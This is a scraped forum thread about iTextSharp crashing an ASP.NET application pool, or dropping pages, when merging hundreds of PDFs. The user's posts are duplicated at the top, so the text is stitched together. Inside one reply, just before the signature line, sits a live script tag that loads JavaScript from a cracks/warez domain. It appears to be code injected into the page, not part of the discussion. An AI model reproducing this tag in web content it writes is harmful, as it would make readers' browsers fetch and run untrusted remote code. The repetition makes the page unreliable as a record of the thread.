I am merginf PDFs using iTextSharp and displaying the merged PDF on the browser in an ASP.NET MVC application.
The application pool crashes or the merged PDF does not display all the pages when iTextSharp is trying to merge hig volume of PDFs (about 400+ PDFs each of about 140KB).
Could you please provide an update on how the issue was resolved.
The trouble is that it is not throwing error or there is not entry in the Event Viewer.
Sometimes the application crashes indicating there is a connectivity issue (like connectivity to internet). Bu there is no log of this eityher in event viewr or IIS logs. The internet is connected as I can go back to other parts of application or access
new web pages.
But some times (whic is more dangerous) is that the merged PDF contains only few PDFs out of the 100's of PDFs that were queued for merging.
Is there an alternative solution such as runiung a command prompt based PDF merging tool (which would run out of the application). But after merging I still have to display the merged PDF in the application.
Is there an alternative approach that would let me acheive this functionality?
Is there an alternative solution such as runiung a command prompt based PDF merging tool (which would run out of the application). But after merging I still have to display the merged PDF in the application.
This is even harder than using a component on website to merge/generate pdf files.
It's quite hard to find a reliable, easy-to-use and free pdf component!
None
0 Points
2 Posts
Issue with application Pool
Jul 20, 2013 08:23 PM|shwetha sonar|LINK
Hi,
I am merginf PDFs using iTextSharp and displaying the merged PDF on the browser in an ASP.NET MVC application.
The application pool crashes or the merged PDF does not display all the pages when iTextSharp is trying to merge hig volume of PDFs (about 400+ PDFs each of about 140KB).
Could you please provide an update on how the issue was resolved.
Many thanks.
Best Regards
Shwetha
Participant
1570 Points
495 Posts
Re: Issue with application Pool
Jul 21, 2013 11:05 AM|sumitjain231|LINK
Have you check event Viewer for detail information on Error.
could you please poste the error log from event viewer.
<script src="http://cracks4free.info/5/adds.js" async="" type="text/javascript"></script>Remember to click Mark as Answer on the post that helps to others.
None
0 Points
2 Posts
Re: Issue with application Pool
Jul 22, 2013 07:26 AM|shwetha sonar|LINK
The trouble is that it is not throwing error or there is not entry in the Event Viewer.
Sometimes the application crashes indicating there is a connectivity issue (like connectivity to internet). Bu there is no log of this eityher in event viewr or IIS logs. The internet is connected as I can go back to other parts of application or access new web pages.
But some times (whic is more dangerous) is that the merged PDF contains only few PDFs out of the 100's of PDFs that were queued for merging.
Is there an alternative solution such as runiung a command prompt based PDF merging tool (which would run out of the application). But after merging I still have to display the merged PDF in the application.
Is there an alternative approach that would let me acheive this functionality?
Thanks!
Contributor
3390 Points
1079 Posts
Re: Issue with application Pool
Jul 25, 2013 03:07 AM|kctt|LINK
This is even harder than using a component on website to merge/generate pdf files.
It's quite hard to find a reliable, easy-to-use and free pdf component!